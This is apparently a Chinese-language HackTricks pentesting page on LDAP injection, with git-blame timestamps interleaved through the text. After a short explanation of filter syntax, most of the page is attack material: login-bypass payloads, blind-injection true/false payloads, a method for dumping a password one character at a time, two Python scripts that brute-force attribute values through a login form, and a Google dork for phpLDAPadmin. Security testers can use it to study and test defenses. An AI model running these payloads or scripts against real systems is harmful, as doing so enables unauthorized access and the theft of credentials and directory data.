2024-04-15 03:55:19 +00:00
|
|
|
|
# LDAP注入
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## LDAP注入
|
2022-05-07 13:38:40 +00:00
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-03 16:02:37 +00:00
|
|
|
|
支持HackTricks的其他方式:
|
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|
|
|
|
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
2022-04-30 20:31:18 +00:00
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
如果您对**黑客职业**感兴趣并想要黑入无法黑入的系统 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
|
2024-02-18 14:44:30 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://www.stmcyber.com/careers" %}
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## LDAP注入
|
2022-04-30 20:31:18 +00:00
|
|
|
|
|
2022-05-07 13:38:40 +00:00
|
|
|
|
### **LDAP**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
**如果您想了解什么是LDAP,请访问以下页面:**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
|
|
|
|
|
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
|
2021-10-18 11:21:18 +00:00
|
|
|
|
{% endcontent-ref %}
|
2021-06-08 20:38:29 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
**LDAP注入**是一种针对从用户输入构建LDAP语句的Web应用程序的攻击。当应用程序**未能正确清理**输入时,攻击者可以通过本地代理**操纵LDAP语句**,可能导致未经授权的访问或数据操纵。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
|
2021-10-18 11:21:18 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
**过滤器** = ( filtercomp )\
|
2021-10-18 11:21:18 +00:00
|
|
|
|
**Filtercomp** = and / or / not / item\
|
|
|
|
|
**And** = & filterlist\
|
|
|
|
|
**Or** = |filterlist\
|
|
|
|
|
**Not** = ! filter\
|
|
|
|
|
**Filterlist** = 1\*filter\
|
|
|
|
|
**Item**= simple / present / substring\
|
|
|
|
|
**Simple** = attr filtertype assertionvalue\
|
|
|
|
|
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
|
|
|
|
|
**Present** = attr = \*\
|
|
|
|
|
**Substring** = attr ”=” \[initial] \* \[final]\
|
|
|
|
|
**Initial** = assertionvalue\
|
|
|
|
|
**Final** = assertionvalue\
|
2024-02-06 04:10:34 +00:00
|
|
|
|
**(&)** = 绝对TRUE\
|
|
|
|
|
**(|)** = 绝对FALSE
|
2021-10-18 11:21:18 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
例如:\
|
2021-10-18 11:21:18 +00:00
|
|
|
|
`(&(!(objectClass=Impresoras))(uid=s*))`\
|
|
|
|
|
`(&(objectClass=user)(uid=*))`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
您可以访问数据库,其中可能包含各种不同类型的信息。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
**OpenLDAP**:如果有2个过滤器到达,只执行第一个。\
|
2024-02-03 16:02:37 +00:00
|
|
|
|
**ADAM或Microsoft LDS**:有2个过滤器时会抛出错误。\
|
2024-02-06 04:10:34 +00:00
|
|
|
|
**SunOne Directory Server 5.0**:执行两个过滤器。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
**非常重要的是发送具有正确语法的过滤器,否则将抛出错误。最好只发送1个过滤器。**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-23 16:42:48 +00:00
|
|
|
|
过滤器必须以`&`或`|`开头\
|
2024-02-06 04:10:34 +00:00
|
|
|
|
示例:`(&(directory=val1)(folder=public))`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
|
`(&(objectClass=VALUE1)(type=Epson*))`\
|
|
|
|
|
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
然后:`(&(objectClass=`**`*)(ObjectClass=*))`**将是第一个过滤器(执行的过滤器)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 登录绕过
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
LDAP支持多种格式存储密码:明文、md5、smd5、sh1、sha、crypt。因此,无论您在密码中插入什么,它都可能被哈希处理。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
user=*
|
|
|
|
|
password=*
|
|
|
|
|
--> (&(user=*)(password=*))
|
|
|
|
|
# The asterisks are great in LDAPi
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
user=*)(&
|
|
|
|
|
password=*)(&
|
|
|
|
|
--> (&(user=*)(&)(password=*)(&))
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
user=*)(|(&
|
|
|
|
|
pass=pwd)
|
|
|
|
|
--> (&(user=*)(|(&)(pass=pwd))
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
user=*)(|(password=*
|
|
|
|
|
password=test)
|
|
|
|
|
--> (&(user=*)(|(password=*)(password=test))
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
user=*))%00
|
|
|
|
|
pass=any
|
|
|
|
|
--> (&(user=*))%00 --> Nothing more is executed
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
user=admin)(&)
|
|
|
|
|
password=pwd
|
|
|
|
|
--> (&(user=admin)(&))(password=pwd) #Can through an error
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
username = admin)(!(&(|
|
|
|
|
|
pass = any))
|
2021-06-08 21:58:39 +00:00
|
|
|
|
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
username=*
|
|
|
|
|
password=*)(&
|
|
|
|
|
--> (&(user=*)(password=*)(&))
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
username=admin))(|(|
|
|
|
|
|
password=any
|
|
|
|
|
--> (&(uid=admin)) (| (|) (webpassword=any))
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
#### 列表
|
2021-06-08 21:58:39 +00:00
|
|
|
|
|
2022-04-30 20:31:18 +00:00
|
|
|
|
* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* [LDAP 属性](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
|
|
|
|
|
* [LDAP PosixAccount 属性](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
### 盲 LDAP 注入
|
2021-06-08 21:58:39 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
您可以强制 False 或 True 响应以检查是否返回任何数据,并确认可能存在盲 LDAP 注入:
|
2021-06-08 21:58:39 +00:00
|
|
|
|
```bash
|
|
|
|
|
#This will result on True, so some information will be shown
|
|
|
|
|
Payload: *)(objectClass=*))(&objectClass=void
|
|
|
|
|
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
#This will result on True, so no information will be returned or shown
|
|
|
|
|
Payload: void)(objectClass=void))(&objectClass=void
|
|
|
|
|
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
#### 转储数据
|
2021-06-08 21:58:39 +00:00
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
您可以迭代ASCII字母、数字和符号:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
(&(sn=administrator)(password=*)) : OK
|
|
|
|
|
(&(sn=administrator)(password=A*)) : KO
|
|
|
|
|
(&(sn=administrator)(password=B*)) : KO
|
|
|
|
|
...
|
|
|
|
|
(&(sn=administrator)(password=M*)) : OK
|
|
|
|
|
(&(sn=administrator)(password=MA*)) : KO
|
|
|
|
|
(&(sn=administrator)(password=MB*)) : KO
|
|
|
|
|
...
|
|
|
|
|
```
|
2024-03-29 21:06:45 +00:00
|
|
|
|
### 脚本
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
#### **发现有效的LDAP字段**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-06 04:10:34 +00:00
|
|
|
|
LDAP对象**默认包含多个属性**,可用于**保存信息**。您可以尝试**暴力破解所有这些属性以提取信息**。您可以在[**此处找到默认LDAP属性列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```python
|
|
|
|
|
#!/usr/bin/python3
|
|
|
|
|
import requests
|
|
|
|
|
import string
|
|
|
|
|
from time import sleep
|
|
|
|
|
import sys
|
|
|
|
|
|
|
|
|
|
proxy = { "http": "localhost:8080" }
|
|
|
|
|
url = "http://10.10.10.10/login.php"
|
|
|
|
|
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
|
|
|
|
|
|
|
|
|
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
|
|
|
|
|
|
|
|
|
|
for attribute in attributes: #Extract all attributes
|
2023-08-03 19:12:22 +00:00
|
|
|
|
value = ""
|
|
|
|
|
finish = False
|
|
|
|
|
while not finish:
|
|
|
|
|
for char in alphabet: #In each possition test each possible printable char
|
|
|
|
|
query = f"*)({attribute}={value}{char}*"
|
|
|
|
|
data = {'login':query, 'password':'bla'}
|
|
|
|
|
r = requests.post(url, data=data, proxies=proxy)
|
|
|
|
|
sys.stdout.write(f"\r{attribute}: {value}{char}")
|
|
|
|
|
#sleep(0.5) #Avoid brute-force bans
|
|
|
|
|
if "Cannot login" in r.text:
|
|
|
|
|
value += str(char)
|
|
|
|
|
break
|
|
|
|
|
|
|
|
|
|
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
|
|
|
|
|
finish = True
|
|
|
|
|
print()
|
|
|
|
|
```
|
2024-03-29 21:06:45 +00:00
|
|
|
|
#### **特殊盲LDAP注入(无"\*")**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```python
|
|
|
|
|
#!/usr/bin/python3
|
|
|
|
|
|
|
|
|
|
import requests, string
|
|
|
|
|
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
|
|
|
|
|
|
|
|
|
flag = ""
|
|
|
|
|
for i in range(50):
|
2023-08-03 19:12:22 +00:00
|
|
|
|
print("[i] Looking for number " + str(i))
|
|
|
|
|
for char in alphabet:
|
|
|
|
|
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
|
|
|
|
|
if ("TRUE CONDITION" in r.text):
|
|
|
|
|
flag += char
|
|
|
|
|
print("[+] Flag: " + flag)
|
|
|
|
|
break
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2024-04-15 03:55:19 +00:00
|
|
|
|
### 谷歌黑客搜索指令
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
intitle:"phpLDAPadmin" inurl:cmd.php
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 更多有效载荷
|
2021-06-08 21:58:39 +00:00
|
|
|
|
|
2022-05-08 22:42:39 +00:00
|
|
|
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
|
|
|
|
|
|
2024-04-15 03:55:19 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
2024-02-18 14:44:30 +00:00
|
|
|
|
|
|
|
|
|
如果您对**黑客职业**感兴趣并想要黑入不可黑入的系统 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
|
2022-05-08 22:42:39 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
{% embed url="https://www.stmcyber.com/careers" %}
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2024-02-09 08:09:21 +00:00
|
|
|
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
2024-02-03 16:02:37 +00:00
|
|
|
|
|
2024-02-09 08:09:21 +00:00
|
|
|
|
支持HackTricks的其他方式:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-09 08:09:21 +00:00
|
|
|
|
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
2024-04-15 03:55:19 +00:00
|
|
|
|
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
2024-03-17 16:19:28 +00:00
|
|
|
|
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
2024-02-09 08:09:21 +00:00
|
|
|
|
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|